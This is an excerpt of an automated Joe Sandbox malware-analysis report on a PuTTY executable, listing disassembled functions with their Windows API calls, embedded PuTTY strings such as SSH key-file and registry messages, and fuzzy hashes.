Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemText
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$Font: %s, %s%d-%s$Font: %s, %sdefault height$bold, $c && c->ctrl->type == CTRL_FONTSELECT$pixel$point
API String ID: 3367045223-1831221297
Opcode ID: bf1966d68baf52773d1f357059487db8a03d32acd9b27f90368288ad783b741b
Instruction ID: 191af5f3f84fa8147fdd79001c4782f65ab3f329243f97af55d12ab0579f768d
Opcode Fuzzy Hash: bf1966d68baf52773d1f357059487db8a03d32acd9b27f90368288ad783b741b
Instruction Fuzzy Hash: 6E21FCF2A00104AFDF00AA54DC46F2B77E5EB85704F4540BDF8099B212F632DE159761

Function 00BD6E00 Relevance: 13.8, APIs: 9, Instructions: 325networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00005000,00000001), ref: 00BD6FA8
accept.WS2_32(?,?,00000080), ref: 00BD6FF8
WSAGetLastError.WS2_32 ref: 00BD7005
closesocket.WS2_32(00000000), ref: 00BD7058
recv.WS2_32(?,?,00005000,00000000), ref: 00BD70EB
ioctlsocket.WS2_32(?,40047307,00000001), ref: 00BD715E
WSAGetLastError.WS2_32 ref: 00BD7170
recv.WS2_32(?,?,00005000,00000000), ref: 00BD7190
WSAGetLastError.WS2_32 ref: 00BD71C1

Part of subcall function 00BC9430: GetTickCount.KERNEL32 ref: 00BC9458
Part of subcall function 00BC9430: QueryPerformanceCounter.KERNEL32 ref: 00BC9476

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorLastrecv$CountCounterPerformanceQueryTickacceptclosesocketioctlsocket
String ID:
API String ID: 2595003436-0
Opcode ID: 46ae8304377a1b3d144f6ce2875573b454ca71c3b7e22faacb12ec000e3b1c72
Instruction ID: 67317dda7ce40f177eaeb5fabd7ce9154220b209f7ed53ea7fd06036126f4513
Opcode Fuzzy Hash: 46ae8304377a1b3d144f6ce2875573b454ca71c3b7e22faacb12ec000e3b1c72
Instruction Fuzzy Hash: A8B1DFB0644700AFD7208B20DC8ABABB7E9EF84704F14496DF99A97391FB71E804CB51

Function 00C64C87 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C65072: CreateFileW.KERNEL32(00000000,00000000,?,00C64D30,?,?,00000000,?,00C64D30,00000000,0000000C), ref: 00C6508F

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC5325), ref: 00C64D9B
__dosmaperr.LIBCMT ref: 00C64DA2
GetFileType.KERNEL32(00000000), ref: 00C64DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC5325), ref: 00C64DB8
__dosmaperr.LIBCMT ref: 00C64DC1
CloseHandle.KERNEL32(00000000), ref: 00C64DE1
CloseHandle.KERNEL32(00C5DFF4), ref: 00C64F2E
GetLastError.KERNEL32 ref: 00C64F60
__dosmaperr.LIBCMT ref: 00C64F67

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 2f79d3c8cd19301189214f26fd09bf103b0d7aaeaeb896c11f0a6073b0991f18
Instruction ID: c01793e65f68ed29ab60a8c4cdbb22508daab57ab9da5c8b0cc423d65e778043
Opcode Fuzzy Hash: 2f79d3c8cd19301189214f26fd09bf103b0d7aaeaeb896c11f0a6073b0991f18
Instruction Fuzzy Hash: BCA12332A145189FCF2D9F68DC95BAE3BB1AB06314F14015DF812EF391CB358A52DB51

Function 00BDCA80 Relevance: 13.6, APIs: 9, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCAB7
OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCAC5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB04
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB21
GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB4B
CopySid.ADVAPI32(00000000,00000000,00000000), ref: 00BDCB6A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB8B
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB9A
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCBA5

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CloseHandleLocalProcess$AllocCopyCurrentErrorFreeLastLengthOpen
String ID:
API String ID: 621491157-0
Opcode ID: 054d20df91746429ac948e3f728adbe2b4965a9d4eca7fe0f2f2c3bafbdf078d
Instruction ID: 5777b9f36628eade46da4930566b3897d5ea009b9377939efdaf0d002965b233
Opcode Fuzzy Hash: 054d20df91746429ac948e3f728adbe2b4965a9d4eca7fe0f2f2c3bafbdf078d
Instruction Fuzzy Hash: 82316E71204309AFE7205FA0DC8AB2BBBE8EF45B40F14456BF945D62A0EA71D801DB95

Function 00BC87C0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 302COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BC8D32

Part of subcall function 00BC36C0: SendDlgItemMessageA.USER32(?,?,0000014B,00000000,00000000), ref: 00BC3744

Part of subcall function 00BC3770: SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00BC37F7

Strings

Invalid key (no key type), xrefs: 00BC8DF5
CA key may not be a certificate (type is '%.*s'), xrefs: 00BC8DEB
Invalid '%.*s' key data, xrefs: 00BC8E7B
Cannot decode key: %s, xrefs: 00BC8E0B
Unrecognised key type '%.*s', xrefs: 00BC8E25
Unable to load host CA record '%s', xrefs: 00BC8CDC

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemMessageSend$_strlen
String ID: CA key may not be a certificate (type is '%.*s')$Cannot decode key: %s$Invalid '%.*s' key data$Invalid key (no key type)$Unable to load host CA record '%s'$Unrecognised key type '%.*s'
API String ID: 706372605-3650709019
Opcode ID: 5caf487a9fe48d18b97a2782277fcbafc9961534bfc33c9829a0eb9fae46b92e
Instruction ID: 1d274cc9d7a67600c40593231e06d3c9d1ed382074580d4f6ed40b782a284320
Opcode Fuzzy Hash: 5caf487a9fe48d18b97a2782277fcbafc9961534bfc33c9829a0eb9fae46b92e
Instruction Fuzzy Hash: D281F5B69002057BD6007B21BC46F6BBAEDEF51359F08447DFC0996253FA22E924D6F2

Function 00BA8080 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

IsZoomed.USER32 ref: 00BA80B3
GetDesktopWindow.USER32 ref: 00BA815C
GetClientRect.USER32(00000000), ref: 00BA8166
IsZoomed.USER32 ref: 00BA81F1
SetWindowPos.USER32(00000000,00000000,00000000,?,?,00000116), ref: 00BA8252
InvalidateRect.USER32(00000000,00000001), ref: 00BA8270

Strings

(, xrefs: 00BA8127

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: RectWindowZoomed$ClientDesktopInvalidate
String ID: (
API String ID: 2702938005-3887548279
Opcode ID: 03af088afe359f0c9a64cd23459d4ef9389e2a6dbb78212c25cde89900d25493
Instruction ID: 9002795d33bf0b516a8fec8279ff107110f0516dca477d7af918f85667cf56d2
Opcode Fuzzy Hash: 03af088afe359f0c9a64cd23459d4ef9389e2a6dbb78212c25cde89900d25493
Instruction Fuzzy Hash: 9C51E4B1608240AFD7149F28EDAAB2E7BE4EB8A304F04046DF946D72B1EB31D855CB41

Function 00BCC730 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 122fileCOMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00BCC7C2
CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 00BCC7FD
GetLastError.KERNEL32 ref: 00BCC870

Part of subcall function 00BCCA10: GetCommState.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00BCC820,?), ref: 00BCCA2C

Part of subcall function 00C076A0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00C076E1
Part of subcall function 00C076A0: InitializeCriticalSection.KERNEL32(00CA53E0,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00C0773A
Part of subcall function 00C076A0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 00C07748
Part of subcall function 00C076A0: CreateThread.KERNEL32(00000000,00000000,00C077A0,00000004,00000000), ref: 00C07772
Part of subcall function 00C076A0: CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 00C0777D

Part of subcall function 00C073C0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C07401
Part of subcall function 00C073C0: InitializeCriticalSection.KERNEL32(00CA53E0,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C0744A
Part of subcall function 00C073C0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C07458
Part of subcall function 00C073C0: CreateThread.KERNEL32(00000000,00000000,00C074B0,00000004,00000000), ref: 00C07482
Part of subcall function 00C073C0: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C0748D

Part of subcall function 00BDEF00: _strlen.LIBCMT ref: 00BDEF0B

Strings

%s%s, xrefs: 00BCC7DB
\\.\, xrefs: 00BCC7CC
Opening '%s': %s, xrefs: 00BCC881
Opening serial device %s, xrefs: 00BCC7AF

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Create$Event$CloseCriticalHandleInitializeSectionThread$CommErrorFileLastState___from_strstr_to_strchr_strlen
String ID: %s%s$Opening '%s': %s$Opening serial device %s$\\.\
API String ID: 2530553318-1737485005
Opcode ID: c86b75ec5e30c46584608b7d97e9999b3c3a78b1408beddee1117379c056d7b9
Instruction ID: 00dda995e6d87954c28aa0502486b5fec7eca54995c37bec327962bad4090d3b
Opcode Fuzzy Hash: c86b75ec5e30c46584608b7d97e9999b3c3a78b1408beddee1117379c056d7b9
Instruction Fuzzy Hash: 7141B3F5A00300AFE7206F20EC4AF2B7AE8EB54718F14057CF9099B3D2F671A90487A5

Function 00BD7790 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 99networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32(?,?), ref: 00BD77C2
htons.WS2_32(?), ref: 00BD7825
inet_ntoa.WS2_32(?), ref: 00BD7836

Part of subcall function 00BDEF00: _strlen.LIBCMT ref: 00BDEF0B

htons.WS2_32(?), ref: 00BD787F
inet_ntop.WS2_32(00000017,?,?,00000041), ref: 00BD7895

Strings

%s:%d, xrefs: 00BD784C
[%s]:%d, xrefs: 00BD78AB

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: htons$_strlengetpeernameinet_ntoainet_ntop
String ID: %s:%d$[%s]:%d
API String ID: 3126212605-2542140192
Opcode ID: 2ec066de5eae450cc4abe970b6614a09bf0f008c09d62942b373048982b98590
Instruction ID: 7a8303eba7d4a7e463181bea8adbb520c5c6d92e744efd5ccde2d822ff63fcf4
Opcode Fuzzy Hash: 2ec066de5eae450cc4abe970b6614a09bf0f008c09d62942b373048982b98590
Instruction Fuzzy Hash: E5316FB55043009FD7209F65D809B6BBBF4EB88714F00492EF99A87391E775E944CB92

Function 00BC9130 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 77libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00BC916C
GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 00BC9187
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00BC91A2

Strings

CryptReleaseContext, xrefs: 00BC919C
CryptAcquireContextA, xrefs: 00BC9166
CryptGenRandom, xrefs: 00BC9181
advapi32.dll, xrefs: 00BC9150

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressProc
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 190572456-129414566
Opcode ID: 1359f2966b3ee5c344d980842c915d473cc77a7d51901f2a856fc78a3808bdda
Instruction ID: 2ce0087ac43d887b2844d2464d38c17699c63c3e224810a3e05632e08be1ebbe
Opcode Fuzzy Hash: 1359f2966b3ee5c344d980842c915d473cc77a7d51901f2a856fc78a3808bdda
Instruction Fuzzy Hash: 24215174205B02ABEB1C9F65FC5DF6E76E1ABC5715F14406DE845971A0DBB0D800CB29

Function 00BD5DE0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 00BD5E2C
htonl.WS2_32(?), ref: 00BD5E70
inet_ntoa.WS2_32(00000000), ref: 00BD5E7D
_strncpy.LIBCMT ref: 00BD5E8D

Strings

<unknown>, xrefs: 00BD5E3A
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c, xrefs: 00BD5E59
addr->addresses && step.curraddr < addr->naddresses, xrefs: 00BD5E5E

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strncpy$htonlinet_ntoa
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$<unknown>$addr->addresses && step.curraddr < addr->naddresses
API String ID: 3148508921-529704717
Opcode ID: e4ec305783348fcdbbd0b54a61b7e3bb77fb01d77d185bc7d788692561a19962
Instruction ID: 0670c300f25f0e8de2e32de44006f4f1f47b41e2614e6491d5a5288bd1d30e01
Opcode Fuzzy Hash: e4ec305783348fcdbbd0b54a61b7e3bb77fb01d77d185bc7d788692561a19962
Instruction Fuzzy Hash: 9821A175604701AFDB28AF14DC85F2BBBE8EF85754F0444AAF8488B251E730DD45DBA2

Function 00BDFDD0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(00000000,00000000), ref: 00BDFDDC
GetWindowLongA.USER32(00000000,000000F0), ref: 00BDFDED
GetWindowLongA.USER32(00000000,000000EC), ref: 00BDFDF4
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00BDFE0E
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00BDFE14
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 00BDFE23

Strings

PuTTY, xrefs: 00BDFDD0

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Window$Long$Item
String ID: PuTTY
API String ID: 4195074732-84254484
Opcode ID: 8c36754a9a6c963484a30bc9e562a7cb09cc9e61ad2c7b67d574c85b456e187f
Instruction ID: 120b70f3087a907e38001e3b83869b4598fa331cc55ea3befc90f502fd670fb1
Opcode Fuzzy Hash: 8c36754a9a6c963484a30bc9e562a7cb09cc9e61ad2c7b67d574c85b456e187f
Instruction Fuzzy Hash: 29F0A0321495287BC6102BA9AC08F9FBE9CDFCB3B4F250326F634D21F0CB25591286A4

Function 00BC0A10 Relevance: 12.1, APIs: 8, Instructions: 74windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,0000018A,?,00000000), ref: 00BC0A2F
SendDlgItemMessageA.USER32(?,?,00000189,?,00000000), ref: 00BC0A4D
SendDlgItemMessageA.USER32(?,?,00000199,?,00000000), ref: 00BC0A59
SendDlgItemMessageA.USER32(?,?,00000185,00000000,?), ref: 00BC0A69
SendDlgItemMessageA.USER32(?,?,00000182,?,00000000), ref: 00BC0A75
SendDlgItemMessageA.USER32(?,?,00000181,?), ref: 00BC0A86
SendDlgItemMessageA.USER32(?,?,0000019A,?,00000000), ref: 00BC0A94
SendDlgItemMessageA.USER32(?,?,00000186,?,00000000), ref: 00BC0AA0

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID:
API String ID: 3015471070-0
Opcode ID: c505e29b067830760c4e6d2738fefe4079ea074e877f2ea2226a859a857fdb90
Instruction ID: 5eb1d684569c6f8b29435f868811dc6ebde47f21ee1bc6a30a41afde68b4472c
Opcode Fuzzy Hash: c505e29b067830760c4e6d2738fefe4079ea074e877f2ea2226a859a857fdb90
Instruction Fuzzy Hash: CA01B5712813087BF12126129C46FAF7E6CDFC3F88F014119F744691C0D9A6AE02827E

Function 00C03600 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 264COMMON

Download Yara Rule

APIs

Part of subcall function 00C03530: __fread_nolock.LIBCMT ref: 00C0357A

_strlen.LIBCMT ref: 00C037D6

Strings

file format error, xrefs: 00C036FE
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/sshpubk.c, xrefs: 00C0368E
SSH PRIVATE KEY FILE FORMAT 1.1, xrefs: 00C036ED
file is too large to be a key file, xrefs: 00C0363C
false && "bad status value in lf_load_keyfile_helper", xrefs: 00C03693

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: __fread_nolock_strlen
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/sshpubk.c$SSH PRIVATE KEY FILE FORMAT 1.1$false && "bad status value in lf_load_keyfile_helper"$file format error$file is too large to be a key file
API String ID: 3531255544-1271053808
Opcode ID: b001f2f262b39860c7413434cf207d6cf0a5834c8c62785ca48bc2a762b23ecc
Instruction ID: de208a6f127b724fb45cf33ab24149bbc40a03b2fbb29971746e6a3e974cc33e
Opcode Fuzzy Hash: b001f2f262b39860c7413434cf207d6cf0a5834c8c62785ca48bc2a762b23ecc
Instruction Fuzzy Hash: D981D3F1A04340BFDB10AF24EC46B6ABBA8BF51308F044539F85946392F772AA54D792

Function 00BD4400 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 255COMMON

Download Yara Rule

APIs

Part of subcall function 00BDC110: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 00BDC182
Part of subcall function 00BDC110: RegCloseKey.ADVAPI32(?), ref: 00BDC1BA

Part of subcall function 00BDC340: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00BD4BC3,00000000,RandSeedFile), ref: 00BDC367
Part of subcall function 00BDC340: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00BDC39F

_strcspn.LIBCMT ref: 00BD44E1
_strcspn.LIBCMT ref: 00BD45BD
_strcspn.LIBCMT ref: 00BD4533

Part of subcall function 00BDC1E0: RegCloseKey.ADVAPI32(00000000,00BD4BCE,00000000), ref: 00BDC1E4

Strings

Software\SimonTatham\PuTTY\SshHostKeys, xrefs: 00BD4439
%s@%d:, xrefs: 00BD441F
rsa, xrefs: 00BD4495

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strcspn$CloseQueryValue$Create
String ID: %s@%d:$Software\SimonTatham\PuTTY\SshHostKeys$rsa
API String ID: 3610292695-1153710622
Opcode ID: 2e93dd008d9ce988cb354a29a0848e0f8771ce9a2b67fc35e87810bacc50d99c
Instruction ID: 12f78a686473721f546ab7fcf5f073fae6da1e11ed6e2e66bab92da1c9ddb9c0
Opcode Fuzzy Hash: 2e93dd008d9ce988cb354a29a0848e0f8771ce9a2b67fc35e87810bacc50d99c
Instruction Fuzzy Hash: 156104A6E042052BD7117A24AC42B2BF6DD9F51308F0904BAFC49A7343F776ED15C6A2

Function 00BC5070 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 191COMMON

Download Yara Rule

Strings

%H%M%S, xrefs: 00BC51C5
&, xrefs: 00BC5173
&, xrefs: 00BC5220
&, xrefs: 00BC5121

Memory Dump Source

